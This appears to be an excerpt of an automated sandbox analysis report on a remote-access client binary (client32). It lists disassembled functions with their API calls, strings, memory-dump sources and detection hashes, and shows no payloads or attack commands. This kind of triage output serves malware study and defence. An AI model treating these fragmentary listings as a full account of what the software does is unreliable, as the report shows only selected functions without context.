                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess$ErrorLastMessageSleep_malloc_memmove_memset_strrchrwsprintf
                                                                              • String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$redirect:
                                                                              • API String ID: 3725223747-3293259664
                                                                              • Opcode ID: 65fbcd292fc2e97c14b863c0970ab91c49f26a03f1556fc5066ab98669f3dd53
                                                                              • Instruction ID: 67eb2363300651043992ab9ba8f6f3d77738c65c139b63c55815287ab0b028a8
                                                                              • Opcode Fuzzy Hash: 65fbcd292fc2e97c14b863c0970ab91c49f26a03f1556fc5066ab98669f3dd53
                                                                              • Instruction Fuzzy Hash: DBB1C479E116269FDB06CF94CC95BEDF3F1BF89248F008165E81667384FA31A905CBA1
                                                                              Function 11043240 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 244COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • _memset.LIBCMT ref: 110433A9
                                                                              • GetSystemMetrics.USER32(0000004C), ref: 110433B9
                                                                              • GetSystemMetrics.USER32(0000004D), ref: 110433C1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MetricsSystem$__wcstoi64_memset
                                                                              • String ID: Client$DisableTouch$Inject Touch Down @ %d,%d, w=%d,h=%d, id=%d$Inject Touch Up @ %d,%d, id=%d
                                                                              • API String ID: 3760389471-710950153
                                                                              • Opcode ID: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                              • Instruction ID: 3df93499149cd7a4cb1b4a3ff8c52798864cd21da05d47721e0dc8214685208f
                                                                              • Opcode Fuzzy Hash: 6ae8af2f14032af259bd57272b05dbbc70a801c8653cb383b5f76f4abd90dcc8
                                                                              • Instruction Fuzzy Hash: 2491D270D0465A9FCB04DFA9C880AEEFBF5FF48304F108169E555AB294DB34A905CB90
                                                                              Function 1106E2A0 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 190COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,AB86ACF8,?,75BF7CB0,75BF7AA0), ref: 1106E322
                                                                              • SetEvent.KERNEL32(?,?,00000000,1106C3F0,?,?), ref: 1106E402
                                                                              Strings
                                                                              • erased=%d, idata->dead=%d, xrefs: 1106E4D3
                                                                              • ..\ctl32\Connect.cpp, xrefs: 1106E4EA
                                                                              • Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106E305
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalEnterEventSection
                                                                              • String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
                                                                              • API String ID: 2291802058-2272698802
                                                                              • Opcode ID: 1117f4c99858950bdf7fd7672d5969ca3ec3e6b5db68b6395f532a2427e1d8b3
                                                                              • Instruction ID: 66fcff3922a30ee90d8c0767053203911b60367f0834e94f449308d57fcee819
                                                                              • Opcode Fuzzy Hash: 1117f4c99858950bdf7fd7672d5969ca3ec3e6b5db68b6395f532a2427e1d8b3
                                                                              • Instruction Fuzzy Hash: 9371C074E043A59FE715CF64C488F9ABBE9BB04318F1485D9E41A9B291DB30ED85CF90
                                                                              Function 11158310 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 152COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 11158356
                                                                                • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                              • _memset.LIBCMT ref: 1115836F
                                                                              • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 111583CF
                                                                              • _malloc.LIBCMT ref: 111583F7
                                                                              • _free.LIBCMT ref: 111584D3
                                                                              • _free.LIBCMT ref: 111584DF
                                                                                • Part of subcall function 110EE290: _memmove.LIBCMT ref: 110EE3AF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _free_malloc$AllocateBitsHeap_memmove_memset
                                                                              • String ID: (
                                                                              • API String ID: 3140430649-3887548279
                                                                              • Opcode ID: 12fdfd4c8a273e77a88b58fe584f7b62bc5b6364b25748152a4ba4f7ded49458
                                                                              • Instruction ID: 15e3a403059262efe8d3bf227268a655022ed24b1a0bcf9f4d942b7dba633f9b
                                                                              • Opcode Fuzzy Hash: 12fdfd4c8a273e77a88b58fe584f7b62bc5b6364b25748152a4ba4f7ded49458
                                                                              • Instruction Fuzzy Hash: F05162B5A112149FDB54DF18CC80B9AB7B9EF89308F4545ADEA09DB341DB30BA44CF68
                                                                              Function 1100A390 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: _sprintf
                                                                              • String ID: Error. soundlevel < -32768 $Error. soundlevel > 32767$Warning. %s$f[%d]=%f, < -1.0$f[%d]=%f, > 1.0
                                                                              • API String ID: 1467051239-371636152
                                                                              • Opcode ID: f275aff281fec65e287fd4839cb214d6aa70ab525a81e0f2bd918c20378b1889
                                                                              • Instruction ID: 522ba922067402ac051fad8bc1310d1daa1aefdf4381fc39071b0cd0fb0c6887
                                                                              • Opcode Fuzzy Hash: f275aff281fec65e287fd4839cb214d6aa70ab525a81e0f2bd918c20378b1889
                                                                              • Instruction Fuzzy Hash: 19416936E04249CBC700DFA8C884ADDFBB4FF85244F6546BDD8981B346DB326995CBA0
                                                                              Function 110B9550 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104timeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowPlacement.USER32(00000000,0000002C,110C032C,?,Norm,110C032C), ref: 110B9594
                                                                              • MoveWindow.USER32(00000000,110C032C,110C032C,110C032C,110C032C,00000001,?,Norm,110C032C), ref: 110B9606
                                                                              • SetTimer.USER32(00000000,0000050D,000007D0,00000000), ref: 110B9661
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ErrorExitLastMessageMovePlacementProcessTimerwsprintf
                                                                              • String ID: Norm$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$j CB::OnRemoteSizeNormal(%d, %d, %d, %d)$m_hWnd
                                                                              • API String ID: 1092798621-1973987134
                                                                              • Opcode ID: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                              • Instruction ID: 30cf71d2af311bb900ca5215c998a4de0afb875ad97720b4279f64133f28c1c1
                                                                              • Opcode Fuzzy Hash: 0a507017cf31c888094ccedf1f2f22b67d6bec0d8edef4dbc35580d5be2b1013
                                                                              • Instruction Fuzzy Hash: F7411EB5B00609AFDB08DFA4C895EAEF7B5FF88304F104669E519A7344DB30B945CB90
                                                                              Function 1112C280 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 103libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1112B9B0: LoadLibraryA.KERNEL32(ws2_32.dll,00000000,?), ref: 1112B9E6
                                                                                • Part of subcall function 1112B9B0: GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 1112BA03
                                                                                • Part of subcall function 1112B9B0: GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 1112BA0D
                                                                                • Part of subcall function 1112B9B0: GetProcAddress.KERNEL32(00000000,socket), ref: 1112BA1B
                                                                                • Part of subcall function 1112B9B0: GetProcAddress.KERNEL32(00000000,closesocket), ref: 1112BA29
                                                                                • Part of subcall function 1112B9B0: GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 1112BA37
                                                                                • Part of subcall function 1112B9B0: FreeLibrary.KERNEL32(00000000), ref: 1112BAAC
                                                                              • LoadLibraryA.KERNEL32(ws2_32.dll,?,?,00000000), ref: 1112C2CA
                                                                              • GetProcAddress.KERNEL32(00000000,ntohl), ref: 1112C2E2
                                                                              • _calloc.LIBCMT ref: 1112C2ED
                                                                              • _free.LIBCMT ref: 1112C38B
                                                                              • FreeLibrary.KERNEL32(00000000), ref: 1112C3A2
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressProc$Library$FreeLoad$_calloc_free
                                                                              • String ID: ntohl$ws2_32.dll
                                                                              • API String ID: 2881363997-4165132517
                                                                              • Opcode ID: b360deecd4c7b58a32711b4f6cbc729d67b5d7b917707d991309c8b9ca3b50e9
                                                                              • Instruction ID: 6f53df559584d72e955e8895b1c3eb0ef550ffad707d5752582ab7c49ea61f7f
                                                                              • Opcode Fuzzy Hash: b360deecd4c7b58a32711b4f6cbc729d67b5d7b917707d991309c8b9ca3b50e9
                                                                              • Instruction Fuzzy Hash: DD314C75E00229DBD7619FA48D80B99F7B8FF48714F6085A5D999A7200DF30AA858FD0
                                                                              Function 110CE050 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(00000000,?), ref: 110CE0C5
                                                                              • GetClientRect.USER32(00000000,?), ref: 110CE0F8
                                                                              • GetWindowRect.USER32(?,?), ref: 110CE103
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Rect$Window$ClientErrorExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$hWnd$m_hWnd
                                                                              • API String ID: 2908456680-3958695921
                                                                              • Opcode ID: df5e566ea26e76600d4433a5829a4f848afd28d6b38a31023cdd4e006d51d81b
                                                                              • Instruction ID: 712cfbea46f41dce34da92735377c28625c10b46f47693fc43de73f5d42021ce
                                                                              • Opcode Fuzzy Hash: df5e566ea26e76600d4433a5829a4f848afd28d6b38a31023cdd4e006d51d81b
                                                                              • Instruction Fuzzy Hash: 4A316275D00219AFDB14CFA8CC81EEEFBB4EF49318F1481A9E9566B244D730A944CFA5
                                                                              Function 11106270 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 100COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 111062A1
                                                                              • EnterCriticalSection.KERNEL32 ref: 111062B8
                                                                              • GetTickCount.KERNEL32 ref: 111062BE
                                                                              • GetTickCount.KERNEL32 ref: 1110635B
                                                                              • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106368
                                                                              Strings
                                                                              • Warning. took %d ms to get simap lock, xrefs: 111062CF
                                                                              • Warning. simap lock held for %d ms, xrefs: 11106379
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountTick$CriticalSection$EnterLeave
                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock
                                                                              • API String ID: 956672424-625438208
                                                                              • Opcode ID: bcf611a48e79798e2679fdea00c267a7477b06a59c5547b500324db8bd2ad56d
                                                                              • Instruction ID: 9d4f7db00d5457b5153fc7aca0f3d87c755b2dbc5f7e99f6effce6267b28cb7e
                                                                              • Opcode Fuzzy Hash: bcf611a48e79798e2679fdea00c267a7477b06a59c5547b500324db8bd2ad56d
                                                                              • Instruction Fuzzy Hash: 8231D075E082559FE310DF64CA84F5AFBF4EB06328F2506A5E829AB790C730EC40CB90
                                                                              Function 110CC360 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(00000000,?), ref: 110CC387
                                                                              • GetWindowRect.USER32(00000000), ref: 110CC38A
                                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 110CC39C
                                                                              • MapDialogRect.USER32(00000000,?), ref: 110CC3C8
                                                                              • GetDlgItem.USER32(00000000,?), ref: 110CC401
                                                                              • SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000010), ref: 110CC41C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$ItemRect$DialogPoints
                                                                              • String ID:
                                                                              • API String ID: 3303679393-3916222277
                                                                              • Opcode ID: 2249c09f5b4b130edb7ef8f619f74de815b9352330d3f536cd16acfa57f50e53
                                                                              • Instruction ID: 5736af7a59c5bbb3b2c62e90579a0a420b4469d74747aaa82dc812657f03fbc3
                                                                              • Opcode Fuzzy Hash: 2249c09f5b4b130edb7ef8f619f74de815b9352330d3f536cd16acfa57f50e53
                                                                              • Instruction Fuzzy Hash: A7314F75E0020EAFCB18CFA9D985EAFBBB8EB88704F10855DE515E7244D774AE40CB64
                                                                              Function 1101E100 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 81COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(00000000,?), ref: 1101E140
                                                                              • GetDlgItem.USER32(00000000,000013A2), ref: 1101E199
                                                                              • GetWindowRect.USER32(00000000), ref: 1101E1A0
                                                                              • GetDlgItem.USER32(00000000,0000139F), ref: 1101E1AF
                                                                              • GetWindowRect.USER32(00000000), ref: 1101E1B6
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 1101E120
                                                                              • m_hWnd, xrefs: 1101E125
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
